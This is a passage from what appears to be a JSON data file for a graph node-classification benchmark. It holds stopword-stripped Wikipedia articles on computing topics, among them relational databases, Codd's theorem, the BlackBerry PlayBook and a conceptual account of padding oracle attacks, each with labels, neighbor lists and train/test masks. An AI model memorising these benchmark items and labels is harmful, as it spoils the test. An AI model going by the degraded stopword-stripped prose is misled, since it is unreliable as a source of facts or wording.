n -tuples mathematics relational database model set unordered collection unique non-duplicated items although dbmss impose order data mathematics tuple order allows duplication e.f. codd originally defined tuples using mathematical definition later one e.f. codd great insights using attribute names instead ordering would much convenient general computer language based relations insight still used today though concept changed name tuple immediate important consequence distinguishing feature relational model cartesian product becomes commutative table accepted visual representation relation tuple similar concept row relvar named variable specific relation type times relation type assigned though relation may contain zero tuples basic principle relational model information principle information represented data values relations accordance principle relational database set relvars result every query presented relation consistency relational database enforced rules built applications use rather constraints declared part logical schema enforced dbms applications general constraints expressed using relational comparison operators one subset ⊆ theoretically sufficient practice several useful shorthands expected available important candidate key really superkey foreign key constraints fully appreciate relational model data essential understand intended interpretation relation body relation sometimes called extension interpreted representation extension predicate set true propositions formed replacing free variable predicate name term designates something one-to-one correspondence free variables predicate attribute names relation heading tuple relation body provides attribute values instantiate predicate substituting free variables result proposition deemed account appearance tuple relation body true contrariwise every tuple whose heading conforms relation appear body deemed false assumption known closed world assumption often violated practical databases absence tuple might mean truth corresponding proposition unknown example absence tuple 'john 'spanish table language skills necessarily taken evidence john speak spanish formal exposition ideas see section set-theoretic formulation data type used typical relational database might set integers set character strings set dates two boolean values true false corresponding type names types might strings int char date boolean etc important understand though relational theory dictate types supported indeed nowadays provisions expected available user-defined types addition built-in ones provided system attribute term used theory commonly referred column similarly table commonly used place theoretical term relation though sql term means synonymous relation table data structure specified list column definitions specifies unique column name type values permitted column attribute value entry specific column row john doe 35 tuple basically thing row except sql dbms column values row ordered tuples ordered instead attribute value identified solely attribute name never ordinal position within tuple attribute name might name age relation table structure definition set column definitions along data appearing structure structure definition heading data appearing body set rows database relvar relation variable commonly known base table heading assigned value time specified table declaration body recently assigned invoking update operator typically insert update delete heading body table resulting evaluation query determined definitions operators used expression query note sql heading always set column definitions described possible column name also two columns name also body always set rows sql possible row appear body sql initially pushed standard language relational databases deviates relational model several places current iso sql standard n't mention relational model use relational terms concepts however possible create database conforming relational model using sql one use certain sql features following deviations relational model noted sql note database servers implement entire sql standard particular allow deviations whereas null ubiquitous example allowing duplicate column names within table anonymous columns uncommon users programs request data relational database sending query written special language usually dialect sql although sql originally intended end-users much common sql queries embedded software provides easier user interface many web sites wikipedia perform sql queries generating pages response query database returns result set list rows containing answers simplest query return rows table often rows filtered way return answer wanted often data multiple tables combined one join conceptually done taking possible combinations rows cartesian product filtering everything except answer practice relational database management systems rewrite optimize queries perform faster using variety techniques number relational operations addition join include project process eliminating columns restrict process eliminating rows union way combining two tables similar structures difference lists rows one table found intersect lists rows found tables product mentioned combines row one table row depending sources consult number operators – many defined terms listed include semi-join outer operators outer join outer union various forms division operators rename columns summarizing aggregating operators permit relation values attributes relation-valued attribute operators group ungroup select statement sql serves handle except group ungroup operators flexibility relational databases allows programmers write queries anticipated database designers result relational databases used multiple applications ways original designers foresee especially important databases might used long time perhaps several decades made idea implementation relational databases popular businesses relations classified based upon types anomalies 're vulnerable database first normal form vulnerable types anomalies database domain/key normal form modification anomalies normal forms hierarchical nature lowest level first normal form database meet requirements higher level normal forms without first met requirements lesser normal forms idealized simple example description relvars relation variables attributes design six relvars customer order order line invoice invoice line product bold underlined attributes candidate keys non-bold underlined attributes foreign keys usually one candidate key chosen called primary key used preference candidate keys called alternate keys candidate key unique identifier enforcing tuple duplicated would make relation something else namely bag violating basic definition set foreign keys superkeys includes candidate keys composite composed several attributes tabular depiction relation example customer relvar relation thought value attributed relvar attempted insert new customer id 1234567890 would violate design relvar since customer id primary key already customer 1234567890 dbms must reject transaction would render database inconsistent violation integrity constraint foreign keys integrity constraints enforcing value attribute set drawn candidate key another relation example order relation attribute customer id foreign key join operation draws information several relations joining relvars example could query database customers orders invoices wanted tuples specific customer would specify using restriction condition wanted retrieve orders customer 1234567890 could query database return every row order table customer id 1234567890 join order table order line table based order flaw database design invoice relvar contains order attribute tuple invoice relvar one order implies precisely one order invoice reality invoice created many orders indeed particular order additionally order relvar contains invoice attribute implying order corresponding invoice always true real world order sometimes paid several invoices sometimes paid without invoice words many invoices per order many orders per invoice many-to-many relationship order invoice also called non-specific relationship represent relationship database new relvar introduced whose role specify correspondence orders invoices order relvar one-to-many relationship orderinvoice table invoice relvar want retrieve every invoice particular order query orders order order relation equals order orderinvoice invoice orderinvoice equals invoice invoice basic notions relational model relation names attribute names represent strings person name usually use variables formula_1 formula_2 range another basic notion set atomic values contains values numbers strings first definition concerns notion tuple formalizes notion row record table next definition defines relation formalizes contents table defined relational model relation closely corresponds usually called extension predicate first-order logic except identify places predicate attribute names usually relational model database schema said consist set relation names headers associated names constraints hold every instance database schema one simplest important types relation constraints key constraint tells us every instance certain relational schema tuples identified values certain attributes superkey set column headers values columns concatenated unique across rows formally candidate key superkey subdivided form another superkey functional dependency property value tuple may derived another value tuple input set fds contain subsets header h",
    "neighbors": [
      5632,
      10757,
      4614,
      8201,
      6157,
      2068,
      4630,
      1049,
      5658,
      9248,
      10793,
      10286,
      5172,
      8762,
      4155,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      8792,
      8291,
      9828,
      10340,
      8808,
      2669,
      119,
      1146,
      6780,
      3196,
      2688,
      3712,
      10389,
      4255,
      1697,
      6822,
      4263,
      6311,
      10413,
      9397,
      3767,
      3771,
      7868,
      11457,
      6850,
      9411,
      2246,
      2780,
      734,
      10471,
      3816,
      6383,
      9455,
      7412,
      5880,
      6395,
      3323,
      9467,
      270,
      11024,
      8979,
      7446,
      11030,
      4376,
      5403,
      2344,
      4393,
      5929,
      10551,
      10040,
      1341,
      4416,
      2369,
      5953,
      10048,
      6470,
      5450,
      8016,
      2901,
      10069,
      11098,
      859,
      9075,
      10102,
      3960,
      2936,
      3966,
      10628,
      10632,
      5006,
      2456,
      9112,
      10137,
      7582,
      9631,
      9633,
      9634,
      10145,
      3493,
      1447,
      7080,
      5034,
      946,
      5560,
      9147,
      3004,
      6085,
      2512,
      4055,
      987,
      4065,
      4066,
      7650,
      2026,
      6124,
      2544,
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 9398,
    "label": 4,
    "text": "Cyber_Storm_III:cyber storm iii cyber storm iii international cyber security exercise sponsored united states department homeland security 2010 week-long exercise centered washington dc concluded oct. 1st",
    "neighbors": [
      826
    ],
    "mask": "Test"
  },
  {
    "node_id": 9399,
    "label": 5,
    "text": "Space_Communications_Protocol_Specifications:space communications protocol specifications space communications protocol specifications scps set extensions existing protocols new protocols developed consultative committee space data systems ccsds improve performance internet protocols space environments scps protocol stack consists scps protocol seen use commercially scps-tp usually deployed performance enhancing proxy pep improve tcp performance satellite links",
    "neighbors": [
      5472,
      10924,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 9400,
    "label": 3,
    "text": "Socket_FT3:socket ft3 amd socket ft3 bga-769 targets mobile devices designed apus codenamed kabini temash beema mullins socket ft3b kabini temash -branded products combine jaguar islands gcn uvd 3 vce 2.0 video acceleration amd eyefinity-based multi-monitor support maximum two monitors beema mullins -branded products puma amd radeon rx 200 series gcn uvd 3 vce 2.0 video acceleration amd eyefinity-based multi-monitor support maximum two monitors desktop counterpart socket am1",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      2719,
      4767,
      2463,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 9401,
    "label": 7,
    "text": "Demandware:demandware demandware software technology company headquartered burlington massachusetts provides cloud-based unified e-commerce platform mobile ai personalization order management capabilities related services b2c b2b retailers brand manufacturers around world founded 2004 demandware acquired salesforce 2016 2.8b.. company subsequently renamed salesforce commerce cloud demandware founded 2004 stephan schambach provide hosted service would enable companies develop manage easy-to-use customizable e-commerce websites rather building site scratch service launched first quarter 2005 schambach previously founded early e-commerce company intershop 1992 seed money demandware provided venture capital firms general catalyst partners north bridge venture partners march 15 2012 demandware began trading new york stock exchange raising 88 million initial public offering 16 per share following ipo shares 50 ipo price next morning november 2013 demandware announced underwritten registered public offering demandware headquartered burlington massachusetts company also offices salt lake city utah deerfield beach florida united kingdom france denmark germany netherlands australia hong kong china japan",
    "neighbors": [
      4194,
      10090
    ],
    "mask": "None"
  },
  {
    "node_id": 9402,
    "label": 3,
    "text": "Vectored_interrupt:vectored interrupt computer science vectored interrupt processing technique interrupting device directs processor appropriate interrupt service routine contrast polled interrupt system single interrupt service routine must determine source interrupt checking potential interrupt sources slow relatively laborious process vectored interrupts achieved assigning interrupting device unique code typically four eight bits length device interrupts sends unique code data bus processor telling processor interrupt service routine execute",
    "neighbors": [
      5457,
      7445,
      9599
    ],
    "mask": "None"
  },
  {
    "node_id": 9403,
    "label": 4,
    "text": "Numina_Application_Framework:numina application framework numina application framework product numina solutions llc provides single sign-on capabilities application framework building applications features numina application framework include three main components numina application framework",
    "neighbors": [
      3521,
      7556,
      4107,
      7983,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 9404,
    "label": 4,
    "text": "Ryan_Lackey:ryan lackey ryan donald lackey born march 17 1979 entrepreneur computer security professional co-founder havenco world first data also speaks numerous conferences trade shows including def con rsa data security conference various topics computer security field appeared cover wired magazine numerous television radio print articles havenco sealand lackey operated blueiraq vsat communications company serving dod domestic markets iraq afghanistan us conflicts lackey born west chester pennsylvania also lived throughout us europe anguilla sealand dubai iraq teenager briefly involved globewide network academy lackey attended mit majored course 18 mathematics student mit later dropped due financial constraints lackey became interested electronic cash distributed systems originally massively multiplayer online gaming interest led attending several conferences financial cryptography 98 various mit presentations participating mailing lists cypherpunks dbs eventually implementing patented chaumian digital cash underground library hinde ian goldberg named hinde ten berge dutch cypherpunk also present fc98 part contributed cypherpunks movement one longest anonymous remailer operators 1999 lackey lived san francisco bay area period anguilla moving unrecognized state sealand coast united kingdom establishing havenco december 2002 left havenco following dispute company directors sealand royal family eventually blueiraq business model became economically unfeasible due escalation anti-western violence primarily form improvised explosive devices troop draw downs blueiraq sought venture capital transform large general consumer cellular telephone company however 2008 financial crisis instability iraq afghanistan made fund raising impossible lackey returned us located san francisco worked number start-up companies applying combinator accepted combinator summer 2011 round lackey founded cryptoseal vpn service start-up small group people well known computer security community secured funding ron conway well known venture capital fund june 2014 cryptoseal acquired cloudflare br",
    "neighbors": [
      5392,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9405,
    "label": 3,
    "text": "Motorola_X8_Mobile_Computing_System:motorola x8 mobile computing system motorola x8 mobile computing system chipset motorola android-based smartphones based qualcomm snapdragon system chip s4 pro cpu s4 pro arm-compatible dual-core krait gpu chip 4-core adreno 320 several low-power dsp chips added motorola s4 pro chipset process audio inputs sensors",
    "neighbors": [
      9913
    ],
    "mask": "Test"
  },
  {
    "node_id": 9406,
    "label": 2,
    "text": "Speakable_items:speakable items speakable items part speech recognition feature classic mac os macos operating systems allows user control computer natural speech without train computer beforehand commands must present speakable items folder though created something simple shortcut applescript keyboard command automator workflows speakable items first introduced part apple speech recognition software plaintalk 1993 originally available quadra av models later integrated system 7.1.2 release macintosh system software release mac os x v10.4 featured 12 list features os x mountain lion speakable items relocated accessibility panel system preferences mac os x v10.4 added automator workflows also used speakable items workflow saved application put speakable items folder becomes available speech recognition software words computer recognize execute command name saved automator application words might misspelt computer know proper pronunciation example computer best recognizes les misérables lay mizzer ob automator made comply applescript applications third party non applescript applications limewire final cut studio apps work speakable items unless configure commands define keyboard command 'll select application making keyboard command speakable items useful well innovative recognition gets hard distorted times",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      7842,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      10557,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 9407,
    "label": 2,
    "text": "CrunchBang_Linux:crunchbang linux crunchbang linux abbreviated linux distribution derived debian philip newborough commonly known username corenominal crunchbang designed use comparatively system resources instead desktop environment used customized implementation openbox window manager many preinstalled applications used gtk+ widget toolkit crunchbang software repository drew vast majority packages debian repositories philip newborough announced 6 february 2015 stopped developing crunchbang users would benefit using vanilla debian linux distributions arisen place effort continue environment among significant bunsenlabs crunchbang++ crunchbang linux provided openbox version i686 i486 amd64 architectures october 2010 also lite version fewer installed applications lite version effectively discontinued distribution based – ubuntu 9.04 – reached end-of-life crunchbang prepared switch different base system crunchbang 10 made available february 2011 first version based debian final version crunchbang 11 made available 6 may 2013 crunchbang linux release given version number well code name using name muppet show character first letter code name first letter upstream debian release previously debian squeeze crunchbang statler currently debian wheezy crunchbang waldorf may 2013 jim lynch desktoplinuxreviews.com reviewed crunchbang 11 newborough announced february 2015 abandoning development crunchbang linux feeling longer served purpose users agree number proceeded develop successor distributions bunsenlabs crunchbang++ ++ crunchbang-monara bunsenlabs linux community-organized successor crunchbang based debian 9 stretch stable release 17 30 september 2015 crunchbang domain began redirecting bunsenlabs crunchbang plusplus ++ developed response newborough announcement end crunchbang based debian jessie release 8.1 distribution release 1.0 announced 29 april 2015 latest version based debian 10.0 released 8 july 2019 crunchbang-monara another successor crunchbang based debian 8 stable release",
    "neighbors": [
      7938,
      8837,
      7431,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      8476,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      10687,
      4673,
      708,
      2375,
      4039,
      5962,
      5067,
      8907,
      11388,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      7027,
      9461,
      10860,
      11632,
      6393,
      3068,
      8957
    ],
    "mask": "Train"
  },
  {
    "node_id": 9408,
    "label": 2,
    "text": "BlackBerry_PlayBook:blackberry playbook blackberry playbook mini tablet computer developed blackberry made quanta computer original design manufacturer odm first released sale april 19 2011 canada united states playbook first device run blackberry tablet os based qnx neutrino runs apps developed using adobe air later announced blackberry tablet os would merged existing blackberry os produce new operating system blackberry 10 would used universally across blackberry product line second major revision blackberry playbook os released february 2012 playbook also supports android os applications allowing sold installed blackberry app world store early reviews mixed saying although hardware good several features missing shipments totaled approximately 500,000 units first quarter sales 200,000 following quarter many 700,000 units shipped retailers allegedly remained shelves months prompting blackberry introduce dramatic price reductions november 2011 increase sales sales rebounded following price cuts blackberry shipping approximately 2.5 million blackberry playbooks june 1 2013 end month ceo announced platform would developed rumors forthcoming computer nicknamed 'blackpad press expected similarity apple competing ipad circulated several months announcement research motion co-ceo mike lazaridis adobe systems cto kevin lynch staged first public demonstration playbook october 25 2010 onstage opening-day keynote adobe max 2010 conference among features demonstrated tight integration support adobe air applications full flash support according lazaridis 're trying dumb internet mobile device 've done bring mobile devices level desktop computers lazaridis announced end presentation developers get adobe air applications approved blackberry app world would eligible free blackberry playbook tablets since free playbook offer extended include webworks applications blackberry playbook supports 1080p video playback playbook features 3 mp front-facing camera video chatting wi-fi rear-facing 5 mp camera record 1080p video playbook 1024×600 wsvga aspect ratio 16:9 making device perfectly acceptable viewing hd video content media 7-inch display 3d graphics acceleration features variety sensors including invensense 6-axis gyroscope magnetometer accelerometer playbook uses dual-core texas instruments omap4430 processor newer faster playbook included dual-core texas instruments omap4460 processor blackberry playbook supports high resolution video playback h.264 mpeg4 wmv audio mp3 aac 5.1 wma 5.1 audio playback formats also micro-hdmi port hdmi video output blackberry playbook receives score 428 html5 test browser placing 4th tablets beating chrome beta chrome 18 ios 7 safari ios 6.0 safari opera mobile 12.10 silk 2.2 amazon kindle fire internet explorer 11 android 4.0 browsers blackberry tablet os 2.1 adobe flash version 11.1.121.74 support flash content usable blackberry playbook released canada usa april 19 2011 uk netherlands june 16 2011 united arab emirates june 25 2011 early reviews product mixed praising playbook fluid ui adobe flash supported webkit-based browser flash video support fast javascript html 5.0 web page rendering hdmi output multitasking capabilities playbook criticized initially requiring blackberry native email calendar applications although third party email calendar applications supported platform also relatively native third party applications compared platforms though number available steadily risen following mixed reviews blackberry playbook began gain traction receive better reviews temporary issues solved walt mossberg columnist wall street journal wrote got strong impression rim scrambling get product market rim co-ceo jim balsillie countered critics noting 60 million blackberry smartphones use ability pair playbook april 2013 blackberry ceo thorsten heins stated interview five years n't think 'll reason tablet anymore position analysts attributed blackberry spectacular failure tablet market playbook time launch 2,000 3,000 apps available blackberry app world may 1 2012 24,700 playbook applications available blackberry app world blackberry announced march 24 2011 would expand application ecosystem playbook include blackberry java android-based applications press release blackberry stated developers would able simply repackage code sign submit android apps blackberry app world however first update android 2.3 applications able run playbook applications became available blackberry tablet os 2.0 released february 21 2012 however java applications available future update popular android applications ported onto blackberry world pinterest whatsapp installed users sideloading process however 2.1 os update rim denied sideloading process first decision blackberry ship playbook without native applications e-mail calendar became source criticism derision reviewers users way access email web browser blackberry bridge third-party applications app world blackberry chose security reasons however blackberry made native applications available update system software playbook os 2.0 released february 21 2012 software update added integrated native email calendar contact apps also included visual changes operating system support variety android applications also brought three new applications built os press reader newspaper reader news rss reader print go used send documents pc playbook bbm aka blackberry messenger support included 2.0 update although blackberry intends support bbm future update bbm still supported blackberry bridge software allowing users continue access bridged blackberry smartphone october 3 2012 blackberry released playbook os 2.1 january 30 2013 blackberry confirmed wi-fi playbook newer cellular playbooks would receiving update new blackberry 10 operating system 2013 june 28 2013 company announced plans bring blackberry 10 playbook canceled sparking fears device potential scrapping according blackberry ceo thorsten heins multiple teams spent great deal time energy investigating ways bring os device ultimately heins intervened cancel project citing dissatisfaction level performance user experience immediate decisions device future certain heins promise blackberry would support playbook existing software platforms configurations blackberry bridge accesses mail calendar contacts directly tethered blackberry phone playbook meets encryption standards blackberry phone cryptographic components blackberry os kernels cryptography-related os java modules certified fips 140-2 makes tablet eligible use u.s. federal government agencies blackberry playbook os2.1 update september 2012 enabled full-disk encryption device using algorithm previously used limited enterprise kernel handling tethered content paired blackberry phone first playbook tablet wi-fi connectivity dual core 1 ghz texas instruments omap 4430 processor customers could purchase wifi playbook 16 gb 32 gb 64 gb storage configurations june 2012 16 gb model discontinued however 32 64 gb wi-fi versions remained sale august 2012 playbook 4g lte released canada featured dual-core 1.5 ghz processor 4g lte umts/hspa+ cellular connectivity nfc chip unlike earlier playbook model playbook 4g lte sold carrier channels november 2012 another variant 1.5 ghz playbook playbook 3g+ released uk unlike wi-fi models 4g lte 3g+ models available 16 gb 64 gb versions following launch blackberry 10 operating system blackberry z10 smartphone blackberry ceo thorsten heins confirmed company exploring opportunities future tablet releases announced plans tablet market playbook would converted new blackberry 10 os decided stop efforts focus core hardware portfolio mobile phones thereby bringing playbook end-of-life march 2015 blackberry announced blackberry secutablet tablet uses samsung knox hardware samsung galaxy tab 10.5 august 2011 blackberry advertised following made playbook accessories leather slipcase valextra italy premium charger delvaux belgium envelope-style leather case leather journal rapid charging pod neoprene zip sleeve convertible case blackberry earphones ganzo japan leather zipped pocket porter japan nylon canvas sleeve zipped bag want les essentiels de la vie canada leather zippered wallet-style case soft shell leather sleeve rapid travel charger brooklyn japan calfskin case ettinger england leather case neoprene sleeve torch smartphone accessing emails leather envelope various sources estimated sales figure launch day alone approximately 50,000 exceeding analyst expectations blackberry announced quarterly earnings half million playbook tablets shipped first quarter however lukewarm market reception reports company allegedly revised second-quarter estimates 2.4 million 800,000 – 900,000 units following several months poor sales blackberry started discounting price playbook original retail price improve product run rate retail december 2011 blackberry took 485 million write-down account offering price discounts sales improved subsequent quarters result according strategy analytics figures 2011 second quarter playbook market share middle 2011 3.3 compared ios ipads apple 61.3 android google 30.1 various windows microsoft 4.6 however playbook remained relatively popular tablet canada earlier years accounting nearly 20 tablet market research motion home country report released july 2012 strong discounting older wi-fi playbooks resulted strong sales uk christmas 2012",
    "neighbors": [
      10368,
      10755,
      9605,
      6539,
      6797,
      9101,
      410,
      2208,
      420,
      11430,
      2679,
      7983,
      8627,
      1083,
      2368,
      7745,
      9163,
      2892,
      11469,
      3152,
      2777,
      8413,
      1377,
      226,
      3949,
      1776,
      9841,
      3828,
      11254,
      4855,
      9341,
      6271
    ],
    "mask": "Test"
  },
  {
    "node_id": 9409,
    "label": 8,
    "text": "Incremental_rendering:incremental rendering incremental rendering refers feature built modern web browsers specifically refers browser ability display partially downloaded web page user browser awaits remaining files server advantage user perceived improvement responsiveness web browser web site purpose incremental rendering similar purpose interlaced jpeg improves presentation speed user quickly displaying low-resolution version image improves high-resolution rather image slowly paints top bottom without incremental rendering web browser must wait code page fully loaded present content user earlier web browsers offered something compromise displaying html page entire html file retrieved inserting images one-by-one retrieved afterwards although utility incremental rendering seems intuitively obvious making happen something art well science sequence various elements web page render almost never strictly top-to-bottom programming fills missing pieces must certain amount guesswork determine best display partial content images particular virtually always loaded following html page browser must consult html file order know images request server server n't present automatically without follow-up request web designers web design software often include hints assist process example including expected heights widths images html code browser may allocate correct amount screen space image actually retrieved server",
    "neighbors": [
      8923,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9410,
    "label": 5,
    "text": "Digital_Multiplex_System:digital multiplex system digital multiplex system dms name shared among several different telephony product lines nortel networks wireline wireless operators among dms-1 originally named dms-256 rural/urban digital loop carrier dms-10 telephone switch dms supernode family telephone switches dms-100 dms-200 dms-250 dms-300 dms-500 dms-gsp dms-msc dms-mtx s/dms optical transmission system exploratory development technology began northern telecom bell northern research labs ottawa ontario 1971 first class 5 switch dms-10 began service 21 october 1977 fort white florida first toll switch class 4 dms-200 entered service 1979 ottawa ontario dms-10 first commercially successful class 5 digital switch north american market profound impact industry numerous digital switching products introduced north american telephone market late 1970s nortel dms family still production genband acquired nortel cvas assets including dms line 2011 rolled ip-based genius platform genius-750nt first product include adaptive nano-tech compression resynchronization modules ericsson replace digital cross-connect dcs place since earliest dms releases previously new technology entered telecommunications industry slowly telephone companies amortizing equipment periods long forty years intending delay introduction digital switching 1990s dms introduction digital technology changed industry became one antecedents encouraged growth internet october 16 2006 nortel received special recognition award canada telecommunications hall fame role pioneering digital communications digital multiplex system dms name arose designation switching matrix design developed exploratory phase project digital multiplexed switch selected basic switching design project product intended successor nortel first electronic switch sp1 called sp2 however dms acronym mellifluous eventually 1975 adopted designation dms-10 dms-100 family products standing system rather switch applied entire digital switching family well dms-1 family digital transmission concentrators dms favoured many european cable operators switching platform voice networks dms-10 widely used rural wireline providers dms-100 200 switches widely deployed throughout u.s. canada regional bell operating companies bell canada independent telephone companies well us military dms-250 backbone number carriers long distance networks dms-300 international gateway switch dms-500 commonly deployed competitive local exchange carriers combines dms-100 250 capabilities dms switches run proprietary multitasking operating system known sos user interface called mapci consists series multi-level menus usually accessed connected vt100 compatible dumb terminal terminal emulator level overlay performs different functions",
    "neighbors": [
      8048,
      11286
    ],
    "mask": "Test"
  },
  {
    "node_id": 9411,
    "label": 1,
    "text": "Codd's_theorem:codd theorem codd theorem states relational algebra domain-independent relational calculus queries two well-known foundational query languages relational model precisely equivalent expressive power database query formulated one language expressed theorem named edgar f. codd father relational model database management domain independent relational calculus queries precisely relational calculus queries invariant choosing domains values beyond appearing database queries may return different results different domains excluded example forbidden query query select tuples occurring relation r r relation database assuming different domains i.e. sets atomic data items tuples constructed query returns different results thus clearly domain independent codd theorem notable since establishes equivalence two syntactically quite dissimilar languages relational algebra variable-free language relational calculus logical language variables quantification relational calculus essentially equivalent first-order logic indeed codd theorem known logicians since late 1940s query languages equivalent expressive power relational algebra called relationally complete codd codd theorem includes relational calculus relational completeness clearly imply interesting database query expressed relationally complete languages well-known examples inexpressible queries include simple aggregations counting tuples summing values occurring tuples operations expressible sql relational algebra computing transitive closure graph given binary edge relation see also expressive power codd theorem also n't consider sql nulls three-valued logic entail logical treatment nulls remains mired controversy additionally sql allows duplicate rows multiset semantics nevertheless relational completeness constitutes important yardstick expressive power query languages compared",
    "neighbors": [
      4065,
      4263,
      5880,
      9397,
      4376
    ],
    "mask": "None"
  },
  {
    "node_id": 9412,
    "label": 4,
    "text": "Padding_oracle_attack:padding oracle attack cryptography padding oracle attack attack uses padding validation cryptographic message decrypt ciphertext cryptography variable-length plaintext messages often padded expanded compatible underlying cryptographic primitive attack relies padding oracle freely responds queries whether message correctly padded padding oracle attacks mostly associated cbc mode decryption used within block ciphers padding modes asymmetric algorithms oaep may also vulnerable padding oracle attacks symmetric cryptography padding oracle attack applied cbc mode operation oracle usually server leaks data whether padding encrypted message correct data allow attackers decrypt sometimes encrypt messages oracle using oracle key without knowing encryption key standard implementation cbc decryption block ciphers decrypt ciphertext blocks validate padding remove pkcs7 padding return message plaintext server returns invalid padding error instead generic decryption failed error attacker use server padding oracle decrypt sometimes encrypt messages mathematical formula cbc decryption depicted cbc decryption xors plaintext block previous ciphertext block result single-byte modification block formula_3 make corresponding change single byte formula_4 suppose attacker two ciphertext blocks formula_5 wants decrypt second block get plaintext formula_4 attacker changes last byte formula_3 creating formula_8 sends formula_9 server server returns whether padding last decrypted block formula_10 correct equal 0x01 padding correct attacker knows last byte formula_11 formula_12 therefore formula_13 padding incorrect attacker change last byte formula_8 next possible value attacker need make 256 attempts one guess every possible byte find last byte formula_4 decrypted block contains padding information bytes used padding additional attempt need made resolve ambiguity determining last byte formula_4 attacker use technique obtain second-to-last byte formula_4 attacker sets last byte formula_4 formula_19 setting last byte formula_3 formula_21 attacker uses approach described time modifying second-to-last byte padding correct 0x02 0x02 block consists 128 bits aes example 16 bytes attacker obtain plaintext formula_4 255⋅16 4080 attempts significantly faster formula_23 attempts required bruteforce 128-bit key original attack published 2002 serge vaudenay concrete instantiations attack later realised ssl ipsec also applied several web frameworks including javaserver faces ruby rails asp.net well software steam gaming client 2012 shown effective hardened security devices earlier attacks fixed tls implementors following public announcement new variant lucky thirteen attack published 2013 used timing side-channel re-open vulnerability even implementations previously fixed early 2014 attack longer considered threat real-life operation though still workable theory see signal-to-noise ratio certain class machines active area development attacks upon cryptographic protocols used secure internet traffic downgrade attack logjam export rsa/freak attacks trick clients using less-secure cryptographic operations provided compatibility legacy clients secure ones available attack called poodle late 2014 combines downgrade attack ssl 3.0 padding oracle attack older insecure protocol enable compromise transmitted data may 2016 revealed cve-2016-2107 fix lucky thirteen openssl introduced another padding oracle",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      9744,
      1683,
      1688,
      3742,
      10526,
      2083,
      11044,
      8358,
      11693,
      11569,
      9394,
      7736,
      9281,
      3657,
      5834,
      10831,
      11345,
      5590,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9413,
    "label": 4,
    "text": "Allot:allot allot ltd. formerly allot communications multinational offices subsidiaries many countries across world allot provider security monetization products allot solutions include deep packet inspection dpi technology change broadband pipes smart networks offering complete network visibility application control subscriber management 2016 company reported 90.4 million revenue allot founded 1996 michael shurman yigal jacoby served chief executive chairman 2006 jacoby previously founded armon networking manufacturer rmon-based network management solutions sold bay networks 33 million 1996 november 2003 deloitte touche named allot fourth fastest-growing company technology fast 50 list citing company revenue growth nearly 1,900 year time 2004 allot raised 38 million several rounds funding several venture capital funds including genesis partners gemini walden israel jafco investment bancboston capital jerusalem venture partners tamar technology ventures november 2006 allot became publicly traded company nasdaq global market ticker symbol allt ipo raised 78 million november 2010 allot dual listing tel aviv stock exchange approved allot partnered openet january 2011 optimize monetization mobile broadband networks allot featured deloitte fast 50 list 2014 131 growth 2009 2013 allot joined hp opennfv partner program july 2015 allowing expand traffic detection function security services onto hp opennfv platform nokia networks partnered allot january 2016 enhance visibility control security swisscom later year allot partnered intel security release mcafee unified security powered allot focused end-to-end security capabilities telefónica partnered allot february 2017 improve user experience enhance network-based security services also 2017 company announced partnerships several russian satellite network operators 2011 reported equipment sold allot illegally reached iran however january 2012 allot cleared ministry defense wrongdoing investigation concluded company unaware internet monitoring equipment sold danish distributor ended iranian hands also 2011 allot settled class-action lawsuit regarding securities fraud involving stock whereby agreed pay 1.3 million usd september 2002 allot acquired netreality provider network application priority switches naps order enhance quality service qos bandwidth management solutions allot acquired esphion new zealand–based developer network protection solutions carriers internet service providers january 2008 acquisition expanded allot mitigation security threats addition isolation remedy infected subscribers distributed denial service ddos attack prevention may 2012 allot acquired ortiva wireless san diego-based developer video traffic optimization equipment allot acquired oversi networks provider rich-media caching content delivery solutions internet video peer-to-peer p2p traffic july 2012 march 2015 allot acquired global security company optenet expanded company security-as-a-service offerings january 2018 allot acquired netonomy ltd. developer software-based cyber security connected home allot provides network intelligence solutions network-based security products communication service providers csps mobile broadband wireless broadband mobile satellite service dsl carriers well enterprises allot portfolio hardware platforms software applications employs dpi turn broadband pipes smart networks value-added internet services rapidly deployed released 2009 allot service gateway-sigma designed increase subscriber quality experience qoe ability generate additional revenue streams 2014 allot released allot service gateway tera unified framework physical virtual deployment across access networks december 2014 allot unveiled allot cloud access optimization designed enterprises cloud managed service providers three levels coverage used office 365 adds visibility control security applications allot smartengage designed enhance company engagement subscribers launched february 2015 smartengage uses 